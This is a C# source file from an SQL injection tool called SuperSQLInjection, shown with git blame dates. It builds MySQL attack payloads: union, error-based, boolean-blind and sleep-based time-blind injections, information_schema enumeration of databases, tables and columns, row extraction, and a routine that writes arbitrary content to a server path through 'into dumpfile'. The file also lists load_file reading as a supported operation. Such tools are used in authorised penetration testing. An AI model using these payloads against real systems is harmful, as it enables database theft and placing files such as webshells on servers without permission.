Files
SuperSQLInjectionV1/SuperSQLInjection/payload/MySQL.cs

323 lines
11 KiB
C#
Raw Normal View History

2017-03-13 16:12:15 +08:00
using System;
using System.Collections.Generic;
using System.Text;
using tools;
namespace SuperSQLInjection.payload
{
class MySQL
2017-03-13 16:12:15 +08:00
{
//加载对应配置(需要读取的环境变量)
public static String path = "config/vers/mysql.txt";
2017-03-13 16:12:15 +08:00
public static List<String> vers = FileTool.readFileToList(path);
public static String char_length = "(select char_length({data}))";
2018-08-21 15:43:31 +08:00
2017-03-13 16:12:15 +08:00
//数据库数量
public static String dbs_count = "(select count(1) from information_schema.schemata)";
2017-03-13 16:12:15 +08:00
//表数量
public static String tables_count = "(select count(1) from information_schema.tables where table_schema='{dbname}')";
2017-03-13 16:12:15 +08:00
//列数量
public static String columns_count = "(select count(1) from information_schema.columns where table_schema='{dbname}' and table_name='{table}')";
2017-03-13 16:12:15 +08:00
//获取数据库名
public static String db_value = "(select schema_name from information_schema.schemata limit {index},1)";
//获取表名称
public static String table_value = "(select table_name from information_schema.tables where table_schema='{dbname}' limit {index},1)";
//获取列名称
public static String column_value = "(select column_name from information_schema.columns where table_schema='{dbname}' and table_name='{table}' limit {index},1)";
public static String bool_length = "char_length({data})";
public static String bool_value = "ascii(mid({data},{index},1))";
2018-08-21 15:43:31 +08:00
public static String mid_value = "(mid({data},{index},1))";
2017-03-13 16:12:15 +08:00
//获取数据库数量bool方式
public static String bool_db_count = " " + dbs_count + ">{len}";
2017-03-13 16:12:15 +08:00
//获取表数量bool
public static String bool_tables_count = " " + tables_count + ">{len}";
2017-03-13 16:12:15 +08:00
//获取列数量bool
public static String bool_columns_count = " " + columns_count + ">{len}";
2017-03-13 16:12:15 +08:00
//多字符长度判断
2018-08-21 15:43:31 +08:00
//public static String mu_value = "(hex(convert((mid({data},{index},1)) using UTF8)))";
//多字符处理判断
public static String ord_value = "(ord(mid({data},{index},1)))";
2017-03-13 16:12:15 +08:00
//bool方式字符长度判断
public static String ver_length = " "+ bool_length + ">{len}";
2018-11-14 00:01:17 +08:00
//bool方式字符长度判断
public static String char_len= "char_length({data})";
2017-03-13 16:12:15 +08:00
//bool方式获取值
public static String ver_value = " "+ bool_value + ">{len}";
2018-08-21 15:43:31 +08:00
//bool方式获取值
public static String bool_ord_value = " " + mid_value + ">{len}";
2018-08-21 15:43:31 +08:00
2017-03-13 16:12:15 +08:00
//获取行数据bool
public static String data_value = "(select {columns} from `{dbname}`.`{table}` limit {index},1)";
2017-03-13 16:12:15 +08:00
//获取数据bool,加入orderby解决盲注获取数据时获取到的数据每一行可能不对称的可能
public static String bool_data_value = "(select {column} from (select {columns} from `{dbname}`.`{table}` limit {index},1)tmp)";
2017-03-13 16:12:15 +08:00
//union获取数据条数
2019-08-23 16:34:43 +08:00
public static String data_count = "(select count(1) from `{dbname}`.`{table}`)";
2017-03-13 16:12:15 +08:00
//bool判断数据条数
public static String bool_datas_count = " " + data_count + ">={len}";
2017-03-13 16:12:15 +08:00
//union获取值
public static String union_value = " 1=2 union all select {data}";
2017-03-13 16:12:15 +08:00
//error方式
2019-08-23 16:34:43 +08:00
public static String error_value = " (select 1 from (select count(1),concat(({data}),floor(rand(0) xor 1))x from information_schema.tables group by x)a)";
2017-03-13 16:12:15 +08:00
public static String hex = "(select hex({data}))";
public static String hex_value = "(select hex(convert(({data}) using UTF8)))";
2018-08-21 15:43:31 +08:00
2017-03-13 16:12:15 +08:00
public static String substr_value = "(select substr({data},{start},{len}))";
public static String getBoolDataBySleep(String data,int maxTime)
{
return " (select 1 from (select(sleep(" + maxTime + "-(if((" + data + ">{len}), 0, " + maxTime + ")))))" + Tools.RandStr(6) + ")";
2017-03-13 16:12:15 +08:00
}
public static String getBoolCountBySleep(String data, int maxTime)
{
return " (select 1 from (select(sleep(" + maxTime + "-(if((" + data + "), 0, " + maxTime + ")))))" + Tools.RandStr(6) + ")";
}
2017-03-13 16:12:15 +08:00
/// <summary>
/// 生成联合查询的列的字符串如1,2,3,用于union注入
/// </summary>
/// <param name="columnsLen">列长度</param>
/// <param name="showIndex">显示列是第几列</param>
/// <param name="fill">其他列填充字符</param>
/// <param name="columns">填充显示列的对应列集合数据</param>
/// <param name="table">表明</param>
/// <param name="dbName">数据库名</param>
/// <param name="dbName">limit下标,没有填写-1</param>
/// <returns></returns>
public static String creatMySQLColumnsStrByUnion(int columnsLen, int showIndex, String fill, List<String> columns, String table, String dbName, int limit)
{
StringBuilder sb = new StringBuilder();
for (int i = 1; i <= columnsLen; i++)
{
if (i == showIndex)
{
sb.Append(concatMySQLColumnStr(columns) + ",");
2017-03-13 16:12:15 +08:00
}
else
{
sb.Append(fill + ",");
}
}
sb.Remove(sb.Length - 1, 1).ToString();
if (!Tools.checkEmpty(dbName))
{
sb.Append(" from `" + dbName + "`.");
2017-03-13 16:12:15 +08:00
if (!Tools.checkEmpty(table))
{
sb.Append(table);
}
}
else
{
if (!Tools.checkEmpty(table))
{
sb.Append(" from `" + table+ "`");
2017-03-13 16:12:15 +08:00
}
}
if (limit >= 0)
{
sb.Append(" limit " + limit + ",1");
}
return sb.ToString();
}
2018-08-21 15:43:31 +08:00
public static String creatMySQLReadFileByUnion(int columnsLen, int showIndex,String fill,String data)
2017-03-13 16:12:15 +08:00
{
StringBuilder sb = new StringBuilder();
for (int i = 1; i <= columnsLen; i++)
{
if (i == showIndex)
{
sb.Append(concatMySQLColumn(data) + ",");
2017-03-13 16:12:15 +08:00
}
else
{
2018-08-21 15:43:31 +08:00
sb.Append(fill+",");
2017-03-13 16:12:15 +08:00
}
}
return sb.Remove(sb.Length - 1, 1).ToString();
}
2018-08-21 15:43:31 +08:00
public static String creatMySQLWriteFileByUnion(int columnsLen, int dataIndex,String fill, String path,String content)
2017-03-13 16:12:15 +08:00
{
StringBuilder sb = new StringBuilder(" 1=1 union select ");
2017-03-13 16:12:15 +08:00
for (int i = 1; i <= columnsLen; i++)
{
if (i == dataIndex)
{
sb.Append(Tools.strToHex(content,"UTF-8")+",");
}
else
{
2018-08-21 15:43:31 +08:00
sb.Append(fill+",");
2017-03-13 16:12:15 +08:00
}
}
sb.Remove(sb.Length - 1, 1);
sb.Append(" into dumpfile '"+path+"'");
return sb.ToString();
}
public static String creatMySQLColumnsStrByError(List<String> columns, String table, String dbName, int limit)
{
StringBuilder sb = new StringBuilder();
sb.Append(concatMySQLColumnStr(columns));
2017-03-13 16:12:15 +08:00
if (!Tools.checkEmpty(dbName))
{
sb.Append(" from `" + dbName + "`.");
2017-03-13 16:12:15 +08:00
if (!Tools.checkEmpty(table))
{
sb.Append(table);
}
}
else
{
if (!Tools.checkEmpty(table))
{
sb.Append(" from `" + table+ "`");
2017-03-13 16:12:15 +08:00
}
}
if (limit >= 0)
{
sb.Append(" limit " + limit + ",1");
}
return sb.ToString();
}
public static String creatMySQLColumnsStr(List<String> columns, String table, String dbName, int limit)
2017-03-13 16:12:15 +08:00
{
StringBuilder sb = new StringBuilder("(select concat_ws(0x242424,");
foreach (String c in columns) {
2019-08-10 18:34:52 +08:00
sb.Append("ifnull("+c + ",0x20),");
}
if (columns.Count > 0)
{
sb.Remove(sb.Length - 1, 1);
}
sb.Append(")");
if (!Tools.checkEmpty(dbName))
{
sb.Append(" from `" + dbName + "`.");
if (!Tools.checkEmpty(table))
{
sb.Append(table);
}
}
else
{
if (!Tools.checkEmpty(table))
{
sb.Append(" from `" + table+ "`");
}
}
if (limit >= 0)
{
sb.Append(" limit " + limit + ",1)");
2017-03-13 16:12:15 +08:00
}
return sb.ToString();
}
2017-03-13 16:12:15 +08:00
/// <summary>
/// 生成查询列数据
/// </summary>
/// <param name="columns">列明</param>
/// <returns></returns>
public static String concatMySQLColumnStr(List<String> columns)
2017-03-13 16:12:15 +08:00
{
StringBuilder sb = new StringBuilder("concat(0x5e5e21,concat_ws(0x242424,");
2017-03-13 16:12:15 +08:00
for (int i = 0; i < columns.Count; i++)
{
if (columns.Count > 1)
{
2019-08-10 17:46:18 +08:00
sb.Append("ifnull("+columns[i] + ",0x20),");
2017-03-13 16:12:15 +08:00
}
else
{
2019-08-10 17:46:18 +08:00
sb.Append("ifnull(" + columns[i]+ ",0x20)");
2017-03-13 16:12:15 +08:00
}
}
if (columns.Count > 1)
{
sb.Remove(sb.Length - 1, 1);
2017-03-13 16:12:15 +08:00
}
sb.Append("),0x215e5e)");
2017-03-13 16:12:15 +08:00
return sb.ToString();
2017-03-13 16:12:15 +08:00
}
2017-03-13 16:12:15 +08:00
/// <summary>
/// 生成查询列数据
/// </summary>
/// <param name="columns">列明</param>
/// <returns></returns>
public static String concatMySQLColumn(String column)
2017-03-13 16:12:15 +08:00
{
StringBuilder sb = new StringBuilder("concat(0x5e5e21,");
sb.Append(column);
sb.Append(",0x215e5e)");
return sb.ToString();
}
public static String getBoolDataPayLoad(String column,List<String> columns, String dbName, String table, int index)
{
String data = bool_data_value.Replace("{column}", column).Replace("{columns}", String.Join(",",columns)).Replace("{dbname}", dbName).Replace("{table}", table).Replace("{index}", index + "");
return data;
}
/// <summary>
/// 反射条调用,加载显示支持的文件操作
/// </summary>
/// <returns></returns>
public static List<String> getShowCanDoFile() {
List<String> list = new List<String>();
list.Add("MySQL Load_File读文件");
list.Add("MySQL Union写文件");
return list;
}
2017-03-13 16:12:15 +08:00
}
}